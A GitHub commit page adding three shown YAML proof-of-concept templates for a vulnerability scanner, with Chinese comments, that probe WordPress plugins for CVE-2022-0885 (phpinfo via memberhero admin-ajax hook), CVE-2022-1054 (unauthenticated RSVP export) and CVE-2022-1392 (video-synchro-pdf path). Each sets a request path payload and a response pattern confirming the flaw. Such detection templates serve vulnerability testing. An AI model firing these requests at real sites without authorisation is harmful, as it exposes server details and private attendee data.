Skip to content

Commit 3ad2fd4

Browse files
committed
add 5 cve poc
1 parent cd909da commit 3ad2fd4

File tree

5 files changed

+335
-0
lines changed

5 files changed

+335
-0
lines changed

poc/cve/2022/CVE-2022-0885.yaml

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
info: # 基本信息部分POC的编写者可以任意进行修改。
2+
author: ldw # 编写者
3+
name: CVE-2022-0885 # 规则名称
4+
description: CVE # 规则描述
5+
time: 2022/11/18 # 编写(修改)时间
6+
note: CVE # 备注信息
7+
reference: # 相关信息
8+
- CVE
9+
10+
mutate_rule: # 数组值,可以有多组,它们之间是And关系。
11+
-
12+
mutate_position: # 变异位置,表示你选择哪些位置进行变异
13+
header_all: # 布尔值,表示是否对http的所有header进行变异。
14+
header_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的http header,
15+
-
16+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
17+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
18+
value: # 字符串,你想筛选的值
19+
body_all_leaf_argname: # 布尔值,表示是否对body中所有叶子结点的参数名进行变异
20+
body_all_leaf_argvalue: # 布尔值,表示是否对body中所有叶子结点的参数值进行变异
21+
body_leaf_add_node: # 数组值,表示body新增叶子节点
22+
-
23+
argname: # 字符串,表示参数名
24+
argvalue: # 字符串,表示参数值
25+
body_root_add_node: # 数组值,表示在body的根节点下面直接新增子节点
26+
-
27+
argname: # 字符串,表示参数名
28+
argvalue: # 字符串,表示参数值
29+
body_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的body节点
30+
-
31+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
32+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
33+
value: # 字符串,你想筛选的值
34+
body_str: # 布尔值,表示是否对body字符串整体进行操作
35+
method: # 布尔值,表示是否对method进行操作
36+
netloc: # 布尔值,表示是否对url中网络位置部分进行操作
37+
path: # 布尔值,表示是否对进行操作
38+
query_str: # 布尔值,表示是否对query整体进行操作
39+
url: true # 布尔值,表示是否对整个url进行操作
40+
query_leaf_argname: # 布尔值,表示是否对所有的query参数名进行操作
41+
query_leaf_argvalue: # 布尔值,表示是否对所有的query参数值进行操作
42+
query_add_node: # 数组值,表示query新增的子节点
43+
-
44+
argname: # 字符串,表示参数名
45+
argvalue: # 字符串,表示参数值
46+
query_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的query节点
47+
-
48+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
49+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
50+
value: # 字符串,你想筛选的值
51+
52+
mutate_way: # 数组值,变异方式。表示对你选择的变异位置进行变异的方式,可以有多组,它们之间是And关系
53+
-
54+
pos: 3 # 整数,只能取1,2,3其中一个,分别表示插入末尾,插入随机位置以及替换
55+
value: '/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo' # 字符串,表示你想要的值
56+
57+
response_check: # 数组值,输出检查,用来检查poc是否命中,多个组之间是OR关系
58+
- # 每组内的参数之间是AND关系
59+
status_code: # 表示响应状态码
60+
value: 200 # 需要检查的状态码的值
61+
operator: 5 # 比较规则,可以取值1,2,3,4,5;分别代表操作是字符串包含,正则匹配,大于,小于以及等于
62+
resp_headers: # 表示响应中的headers
63+
value: # 需要检查的响应头中的值
64+
operator: # 比较规则,可以取值1,2;;分别代表操作是字符串包含,正则匹配
65+
resp_body: # 表示响应中的body
66+
value: '>PHP Version <\/td><td class="v">([0-9.]+)' # 需要检查的响应体中的值
67+
operator: 2 # 比较规则,可以取值1,2;分别代表操作是字符串包含,正则匹配

poc/cve/2022/CVE-2022-1054.yaml

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
info: # 基本信息部分POC的编写者可以任意进行修改。
2+
author: ldw # 编写者
3+
name: CVE-2022-1054 # 规则名称
4+
description: CVE # 规则描述
5+
time: 2022/11/18 # 编写(修改)时间
6+
note: CVE # 备注信息
7+
reference: # 相关信息
8+
- CVE
9+
10+
mutate_rule: # 数组值,可以有多组,它们之间是And关系。
11+
-
12+
mutate_position: # 变异位置,表示你选择哪些位置进行变异
13+
header_all: # 布尔值,表示是否对http的所有header进行变异。
14+
header_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的http header,
15+
-
16+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
17+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
18+
value: # 字符串,你想筛选的值
19+
body_all_leaf_argname: # 布尔值,表示是否对body中所有叶子结点的参数名进行变异
20+
body_all_leaf_argvalue: # 布尔值,表示是否对body中所有叶子结点的参数值进行变异
21+
body_leaf_add_node: # 数组值,表示body新增叶子节点
22+
-
23+
argname: # 字符串,表示参数名
24+
argvalue: # 字符串,表示参数值
25+
body_root_add_node: # 数组值,表示在body的根节点下面直接新增子节点
26+
-
27+
argname: # 字符串,表示参数名
28+
argvalue: # 字符串,表示参数值
29+
body_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的body节点
30+
-
31+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
32+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
33+
value: # 字符串,你想筛选的值
34+
body_str: # 布尔值,表示是否对body字符串整体进行操作
35+
method: # 布尔值,表示是否对method进行操作
36+
netloc: # 布尔值,表示是否对url中网络位置部分进行操作
37+
path: # 布尔值,表示是否对进行操作
38+
query_str: # 布尔值,表示是否对query整体进行操作
39+
url: true # 布尔值,表示是否对整个url进行操作
40+
query_leaf_argname: # 布尔值,表示是否对所有的query参数名进行操作
41+
query_leaf_argvalue: # 布尔值,表示是否对所有的query参数值进行操作
42+
query_add_node: # 数组值,表示query新增的子节点
43+
-
44+
argname: # 字符串,表示参数名
45+
argvalue: # 字符串,表示参数值
46+
query_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的query节点
47+
-
48+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
49+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
50+
value: # 字符串,你想筛选的值
51+
52+
mutate_way: # 数组值,变异方式。表示对你选择的变异位置进行变异的方式,可以有多组,它们之间是And关系
53+
-
54+
pos: 3 # 整数,只能取1,2,3其中一个,分别表示插入末尾,插入随机位置以及替换
55+
value: '/wp-admin/admin.php?page=rsvp-admin-export' # 字符串,表示你想要的值
56+
57+
response_check: # 数组值,输出检查,用来检查poc是否命中,多个组之间是OR关系
58+
- # 每组内的参数之间是AND关系
59+
status_code: # 表示响应状态码
60+
value: 200 # 需要检查的状态码的值
61+
operator: 5 # 比较规则,可以取值1,2,3,4,5;分别代表操作是字符串包含,正则匹配,大于,小于以及等于
62+
resp_headers: # 表示响应中的headers
63+
value: # 需要检查的响应头中的值
64+
operator: # 比较规则,可以取值1,2;;分别代表操作是字符串包含,正则匹配
65+
resp_body: # 表示响应中的body
66+
value: 'RSVP Status' # 需要检查的响应体中的值
67+
operator: 1 # 比较规则,可以取值1,2;分别代表操作是字符串包含,正则匹配

poc/cve/2022/CVE-2022-1392.yaml

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
info: # 基本信息部分POC的编写者可以任意进行修改。
2+
author: ldw # 编写者
3+
name: CVE-2022-1392 # 规则名称
4+
description: CVE # 规则描述
5+
time: 2022/11/18 # 编写(修改)时间
6+
note: CVE # 备注信息
7+
reference: # 相关信息
8+
- CVE
9+
10+
mutate_rule: # 数组值,可以有多组,它们之间是And关系。
11+
-
12+
mutate_position: # 变异位置,表示你选择哪些位置进行变异
13+
header_all: # 布尔值,表示是否对http的所有header进行变异。
14+
header_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的http header,
15+
-
16+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
17+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
18+
value: # 字符串,你想筛选的值
19+
body_all_leaf_argname: # 布尔值,表示是否对body中所有叶子结点的参数名进行变异
20+
body_all_leaf_argvalue: # 布尔值,表示是否对body中所有叶子结点的参数值进行变异
21+
body_leaf_add_node: # 数组值,表示body新增叶子节点
22+
-
23+
argname: # 字符串,表示参数名
24+
argvalue: # 字符串,表示参数值
25+
body_root_add_node: # 数组值,表示在body的根节点下面直接新增子节点
26+
-
27+
argname: # 字符串,表示参数名
28+
argvalue: # 字符串,表示参数值
29+
body_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的body节点
30+
-
31+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
32+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
33+
value: # 字符串,你想筛选的值
34+
body_str: # 布尔值,表示是否对body字符串整体进行操作
35+
method: # 布尔值,表示是否对method进行操作
36+
netloc: # 布尔值,表示是否对url中网络位置部分进行操作
37+
path: # 布尔值,表示是否对进行操作
38+
query_str: # 布尔值,表示是否对query整体进行操作
39+
url: true # 布尔值,表示是否对整个url进行操作
40+
query_leaf_argname: # 布尔值,表示是否对所有的query参数名进行操作
41+
query_leaf_argvalue: # 布尔值,表示是否对所有的query参数值进行操作
42+
query_add_node: # 数组值,表示query新增的子节点
43+
-
44+
argname: # 字符串,表示参数名
45+
argvalue: # 字符串,表示参数值
46+
query_filter: # 数组值,可以通过参数名称或者参数值筛选你想要变异的query节点
47+
-
48+
args: # 整数,只能取1或2,分别表示参数名称,参数值。
49+
operator: # 整数,只能取1或2,分别表示正则匹配,字符串相等
50+
value: # 字符串,你想筛选的值
51+
52+
mutate_way: # 数组值,变异方式。表示对你选择的变异位置进行变异的方式,可以有多组,它们之间是And关系
53+
-
54+
pos: 3 # 整数,只能取1,2,3其中一个,分别表示插入末尾,插入随机位置以及替换
55+
value: '/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout' # 字符串,表示你想要的值
56+
57+
response_check: # 数组值,输出检查,用来检查poc是否命中,多个组之间是OR关系
58+
- # 每组内的参数之间是AND关系
59+
status_code: # 表示响应状态码
60+
value: 200 # 需要检查的状态码的值
61+
operator: 5 # 比较规则,可以取值1,2,3,4,5;分别代表操作是字符串包含,正则匹配,大于,小于以及等于
62+
resp_headers: # 表示响应中的headers
63+
value: # 需要检查的响应头中的值
64+
operator: # 比较规则,可以取值1,2;;分别代表操作是字符串包含,正则匹配
65+
resp_body: # 表示响应中的body
66+
value: "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" # 需要检查的响应体中的值
67+
operator: 1 # 比较规则,可以取值1,2;分别代表操作是字符串包含,正则匹配

0 commit comments

Comments
 (0)